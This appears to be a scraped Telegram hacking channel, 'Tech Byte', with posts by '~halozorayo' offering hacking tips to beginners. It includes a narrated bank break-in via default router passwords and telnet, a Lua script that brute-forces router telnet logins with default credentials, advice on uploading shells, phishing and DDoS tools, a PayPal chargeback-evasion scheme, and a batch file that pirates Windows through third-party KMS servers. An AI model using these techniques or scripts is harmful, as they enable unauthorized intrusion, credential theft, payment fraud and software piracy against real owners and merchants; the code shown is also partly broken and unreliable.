Tech Byte
4.68K subscribers
254 photos
3 videos
87 files
192 links
Tech tricks, news, hacking tutorials and dark web guides.

Admin : @anonyguy
Download Telegram
some of us here are not using our common sense at all
yes, we are all noobs
children in pentesting
but that does not mean we should behave like children
have you ever taken the time to study how a url is formed?
take a look at this
pentest.io/books/
the /books means that there is a folder named books on that server
just add /files/
if you want to see all the groups on fb just add /groups to fb.com
this is how i solved two of the real levels on hackthis
i needed the username and password so i just added /members/ to the url and bingo! all the logins appeared
in the other i just added members.js to the url and i saw all the passwords because thats where they are stored
you want to hack a site
have you tried adding /pass/ or /users/ or /members/ to the url to see if you can get the credentials easily?
lets all grow up and tamper with urls
~halozorayo
Local On-line Payment System
=========================
My Dear Friends,
I am really intrigued why we don't have on-line payment system in Ethiopia. The ATM cards of different banks are getting integrated. So what is holding back our IT experts from setting up an on-line payment system for local transactions?
In the other world, it takes only some minutes to fix Paypal button to their marketing websites. And the Paypal system works the background operation once the debit (ATM) card is registered with Paypal. Alipay of China works in similar fashion. I am not asking to use Paypal or Alipay. But, why not setup our own #Ethiopay?
So here is the challenge፦
If anyone comes with the possible executable business plan (with solutions to all legal, business and technical challenges), lets get hands together to make it a realty. I am sure we don't need Elon Musk, Peter Thiel, Tony Hsieh or Jack Ma to do it in Ethiopia. We just need to copy the code and deal with the respective authorities, I think.
Kindly inform all who have the interest and the capability.
Kind Regards,
Getu K.
#Challenge_for_Ethiopay
(Local version of Paypal or Alipay) On-line payment system. Get Kebede
Hello ;I am back sorry For Belated Topic.
I was facing a connection problem on my DSL connection.-------------------EXCLUSIVE REAL LIFE BANK HACK
You guys know I have been taking some of my experience and adding some stuff to it to give you stories.
Well, this time it's the undiluted truth of a bank hack.
One morning in August when some noobs were busy asking how to hack wifi, I thought to myself. , how about hacking a bank?
Time to put my skills to the test
I don't want to mention the name of the bank cos "I am still in there"
;)
But let's assume it's bank.com
The first thing I did was to get the IP address
root@ubuntu$> ping bank.com
And I got 147.6.23.1
Then I thought to myself, hmm I am sure they are using a wifi router
So let me find it and login using a backdoor
I open Firefox on my PC and go to shodan.io, login and scan the netblock using shodan dorks
netblock:147.6.23.1
Yep I found the router and searched for the default pass again. Turns out admin, admin.
So I telnet to the router and Login to get a shell
I saw
root@router$>
Which means I was root
The next thing to do was to find the machines on the network
I used a ping sweep
root@router$> for i in {0..255} do ping 192.168.1.$x | grep succe
I got a list of about 80 hosts (I know they were running Windows)
And this was where it gets interesting...
~halozorayo
Google dork of the week
Finding and downloading mp3 music easily
Go to Google.com
intext:index.of mp3 meskerem getu
Will give you thousands of sites with direct download links to meskerem getu songs
Have fun
~halo
SECURITY IS BASED ON TRUST
You guys know me to be the lulz guy.
Laughing at your security
Today let's talk about one of jacks topics: Hacking NASA with HTML
No, I am just kidding. No HTML
But seriously hacking NASA the lulz way.
Security is based on trust.
This is the very foundation of both pentesting and social engineering
Imagine this
NASA is a company that people work for. The staff is very comfortable to work behind their windows10 machines to help them send a man to Mars.
Now I am only interested in the windows 10 part. Win10 is made by Microsoft. So naturally it means that NASA trusts Microsoft
They don't expect Microsoft to stab them in the back.
So, what if we hack Microsoft and send a Windows 10 update to all win10 machines with our malware?
The machines at NASA will download as install it as part of the OS and ...
Let the lulz begin
If we hack Google all chrome users are owned
If we hack WhatsApp, we can get anyone's messages
It's all based on trust
You trust Microsoft to protect you
That's how you'll get hacked!
#for_the_lulz
~halozorayo
JUST THINKING
I know the security of iot devices are very low, then use of dfault passwords make them so.
So what if I create php bots with facial recognition that will always search the world using the iot cameras.
It will infect routers and then use exploits like eternal blue to install the bots on Windows to spy on your webcam
So the bots will come to my server for a picture then they will use facial recognition to find people from webcams and other public cameras
Then once a person is found it reports back to me with longitude and latitude
Now let's say this device is made, the CIA guys will want to get it
I will get onto their wanted list and I might even be killed
Well anyways there is no harm in trying
~halozorayo
If you have a good paypal account inbox me @anonyguy
PayPal ChargeBack Ultimate Solution.👉WHAT TO DO
Create two PayPal account, always use one to transact with your clients..then store your funds in the second account.
Eg.
Buy the funds with account 1 which is your business account,then transfer it to your private / personal account immediately. Dont keep funds in your business account, always empty the account after every succesful transactions..so when a chargeback is made by these rippers, there will be no fund to be reversed
Special edition
Some quick ports very important to hackers
FTP - port #20
Used for upload and download of files
Imagine if you could gain access to the sites FTP
You can upload your virus or shell!
SSH - port #22 a secure shell, mostly bash which you can use to manipulate a Linux box
Telnet - An less secure port. Can be used to connect to sites and grab banners if you don't have netcat
SMTP - simple mail transmission protocol port #25
This is evidence of email service on the victim
Anyone ready for anonymous phishing?
If you do a scan with nmap and find these ports open, connect to them with the right tools and login using default accounts
You can even write a script to log in until it finds the right password for you!
~halozorayo
THE MOST AWAITED AND COMPLEX QUESTION IS SOLVED
here is a christmas present for you guys
free internet but limited internet:
its just that you have to use the port which is open in your area which could be checked using incloak .com.
Examples.
DROID VPN
Hammer VPN
TROID VPN
BUT they do offer limited internet about 2.5 GB per month…
(It can be used as emergency data when your data pack has exhausted)
note-account balance must be zero
#BugBountyTip did you know that the character '_' acts like the regex character '.' in SQL queries
Yep
NASA has been hacked
Again!
We are still learning how to write hello world
I have been saying it.
No one is truly secure!
Not even NASA!
Challenge write code that can log into routers and give you a shell.
.
Solution: The internet or networking part of coding are called sockets
Sockets allow you to send data from one one pc to the other
In my example, lua reads the IP addresses from a file ~/home/IP.txt
Many routers come with user and pass root toor admin administrator
Here is what using Telnet (port 23) to a router and logging in looks like
.
.
Me: nc 10.0.0.1 23
.
I hope you realize which one is the IP and port
I type this in my shell
If the connection is successful I will see
.
mikrotic router services c 2003
Login:
.
So I type the user name
.
password: bigbone
.
Then I type the password
If it's wrong, I would be asked to log in again
.
Since its successful, I get a shell
.
$>
.
Waiting for my commands
So I type whoami and see root
That's it here is my code
-- are comments like //
.
Import "socket"
.
Local banner = "Router hack 2018 by H.H\nCopy my code to become a script kiddie"
file = "~/home/IP.txt"
creds = {"admin",root","administrator","toor",""}
-- Now lets read the lines in the file and login to those ips
print(banner)
for ip in io.lines(files) do
-- now we read the file let's make the sockets
sock = socket.tcp()
--now let's connect to the IP and see if we get an error meaning IP is offline
local _,err = assert(sock:connect(ip, 23))
if err then print(ip.." is offline ")
break -- if the IP is not online break the loop and move on to the next ip
end
-- if the interpreter gets here then we can start the hack
--now we connect we only need to send user and pass
for user in values(creds) do
for pass in values(creds) do
sock:send(user)
-- send username
sock:send(pass)
--now let's see if it's still asking for login, user or password
reply = sock:receive()
If string.find("ogin", reply) or sting.find("ass", reply) then break end
--if we get here it means we found the password
print(ip.." \t\t\t".."user: \t"..user.. "\tpass:\t".. pass)
break
end
end
end
.
.
If you run my code, you will get an error
It's at io.lines(files) instead of io.lines(file)
This is so that skids or people who think they are too wide to learn coding will get errors when running my code
;)
We intentionally put errors in the code so you guys who hate coding can't run it
.
That Facebook script for hacking...
Who says it doesn't work?
Because you are lazy to debug it, you think it doesn't work
The 31337 are still using it and people keep saying
" it doesn't work "
Suckers
We just want to prevent our code from being abused
;)
Happy hacking
#for_teh_lulz
~halozorayo
There are two stages of hacking.
.
Intrusion and Exploitation
.
~halo
Anyone want to buy bitcoin in ethiopia? inbox @anonyguy
Use your code
.
Humans are naturally lazy
(But you guys are too lazy)
Coding is used for automation
That's why you learn loops.
Use code to print all the numbers from 1 to 100
Someone will just write print("123...
Omg!
Use
for m=1,100 do
print(m)
end
.
Whenever you are given a job to do that will take too much time, let a computer do that for you
.
Did you know if all Facebook (or any websites) users reload a webpage at the same time it will crash the server?
.
But if we keep reloading to ddos a site, it will waste our time and energy
That's why ddos scripts like slowloris and smurf were made!
They make our work easier
.
.
Computers are faster and don't get tired
Use that to your advantage
~halozorayo
What are you expecting to see in this group this 2019?
Please inbox me(@anonyguy) your suggestions below for Topics/Discussion you are Interested in and we will try our best to grant it. ☺️
#StudyTime 📚
Are you depressed that your windows fresh install is restricted, is it pirated? or some saddy watermark stating its not activated?
No worries, i've got a quick solution.
Just hit up the notepad, paste the following, save it with ".bat" extension, and doubleclick it !
@echo off
title Windows 10 Activator &cls&echo ********************************************* &echo Copyright: Jack Reacher &echo ********************************************* &echo.&echo Supported products:&echo - Windows 10 Home &echo - Windows 10 Professional lulz Jack Reacher &echo - Windows 10 Education &echo - Windows 10 Enterprise, Enterprise LTSB &echo.&echo Microsoft Windows 10 activation...
cscript //nologo c:\windows\system32\slmgr.vbs /ipk TX9XD-98N7V-6WMQ6-BX7FG-H8Q99 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk 3KHY7-WNT83-DGQKR-F7HPR-844BM >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk PVMJN-6DFY6-9CCP6-7BKTT-D3WVR >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk MH37W-N47XK-V7XM9-C7227-GCQG9 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk NW6C2-QMPVW-D7KKK-3GKT6-VCFB2 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk NW6C2-QMPVW-D7KKK-3GKT6-VCFB2 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk 2WH4N-8QGBV-H22JP-CT43Q-MDWWJ >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk NPPR9-FWDCX-D2C8J-H872K-2YT43 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk WNMTR-4C88C-JK8YV-HQ7T2-76DF9 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk 2F77B-TNFGY-69QQF-B8YKP-D69TJ >nul
echo ******************************** &echo.&echo.&set i=1
:server
if %i%==1 set KMS_Sev=kms.digiboy.ir
if %i%==2 set KMS_Sev=kms8.MSGuides.com
if %i%==3 set KMS_Sev=kms.chinancce.com
if %i%==4 exit
cscript //nologo c:\windows\system32\slmgr.vbs /skms %KMS_Sev% >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ato | find /i "successfully" && (echo.& echo ********************************************* & echo. & choice /n /c YN /m "Do you want to restart your PC now [Y,N]?" & if errorlevel 2 exit) || (echo The connection to the server failed! Trying to connect to another one... & echo Please wait... & echo. & echo. & set /a i+=1 & goto server)
shutdown.exe /r /t 00
tHERE YOU gO !